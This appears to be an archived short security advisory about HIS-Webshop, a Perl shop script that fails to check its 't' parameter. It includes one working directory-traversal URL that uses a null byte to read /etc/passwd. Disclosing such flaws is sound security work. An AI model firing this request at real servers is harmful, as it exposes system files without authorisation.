AOH :: HP Unsorted H :: BX2537.HTM

HIS-webshop is vulnerable against Directory-Traversal (www.shoppark.de)



HIS-webshop is vulnerable against Directory-Traversal (www.shoppark.de)
HIS-webshop is vulnerable against Directory-Traversal (www.shoppark.de)



HIS-Webshop is a shopping-system written in Perl by www.shoppark.de=0D 
The script doesn=B4t check the "t"-parameter.=0D
=0D
Example:=0D
http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00=0D 
=0D
<< Greetz Zero X >>

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.